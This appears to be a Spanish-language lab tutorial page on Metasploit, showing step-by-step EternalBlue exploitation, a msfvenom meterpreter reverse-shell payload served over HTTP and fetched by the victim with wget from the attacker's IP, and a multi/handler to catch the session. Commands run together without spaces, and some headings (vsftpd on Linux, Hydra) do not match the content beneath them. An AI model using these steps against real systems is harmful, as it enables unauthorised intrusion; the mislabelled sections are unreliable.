Enlace Alternativo de Descarga de los Laboratorios
Uso Básico de Metasploit – Explotación EternalBlue en Windows
EternalBlue es una vulnerabilidad en SMBv1 de Windows (CVE-2017-0143), aprovechada por malware como WannaCry. A continuación, te muestro cómo explotar esta vulnerabilidad usando Metasploit:
# 1. Iniciar Metasploitmsfconsole# 2. Buscar el exploit EternalBlue (CVE-2017-0143)searcheternalblue/CVE-2017-0143# 3. Seleccionar el exploit encontradouse0# 4. Mostrar las opciones disponibles del móduloshowoptions# 5. Configurar la dirección IP de la máquina víctimasetRHOSTS<IPdelamáquinavíctima># 6. Ejecutar el exploitrun
Este exploit aprovecha una vulnerabilidad crítica en SMBv1, permitiendo ejecución remota de código en sistemas no parcheados.
Uso Básico de Metasploit – Explotación vsftpd en Linux
En este ejemplo, creamos un payload malicioso con msfvenom, lo servimos con un servidor HTTP simple, y luego utilizamos el módulo Multihandler en Metasploit para manejar la conexión reverse shell.
-p windows/x64/meterpreter/reverse_tcp: Especifica el payload meterpreter/reverse_tcp para Windows de 64 bits.
LHOST=<IP máquina atacante>: La dirección IP de la máquina atacante (donde recibiremos la conexión).
LPORT=443: El puerto donde la víctima se conectará.
-f exe: Formato de salida .exe.
-o pwned.exe: El nombre del archivo generado.
Para hacer que la víctima descargue el payload, utilizamos un servidor HTTP en la máquina atacante.
python3-mhttp.server80
Este comando inicia un servidor HTTP en el puerto 80.
En la máquina víctima, abrimos un navegador o usamos una utilidad como wget o curl para descargar el archivo ejecutable servido en la máquina atacante:
# Descargar desde la máquina víctima wgethttp://<IPmáquinaatacante>/pwned.exe
Ahora, configuramos Metasploit para manejar la conexión del payload.
# Iniciar msfconsolemsfconsole# 1. Usar el módulo Multihandleruseexploit/multi/handler# 2. Mostrar opcionesshowoptions# 3. Configurar el payload utilizado por el MultihandlersetPAYLOADwindows/x64/meterpreter/reverse_tcp# 4. Configurar el puerto LPORT (debe coincidir con el que usamos en msfvenom, 443 en este caso)setLPORT443# 5. Configurar la dirección IP de la máquina atacantesetLHOST<IPmáquinaatacante># 6. Ejecutar el handlerrun
Este proceso nos permite obtener una sesión meterpreter una vez que el archivo malicioso es ejecutado en la máquina de la víctima.
Uso de Hydra – Ataques de Fuerza Bruta a Contraseñas (SSH y FTP)
En BurpSuite, primero en ajustes en la parte de conexión de proxy debemos configurarlo así.
Ahora ya podemos interceptar la conexión. Le damos a Intercept is off. Ponemos la contraseña y al darle a enviar revisamos que interceptó las credenciales.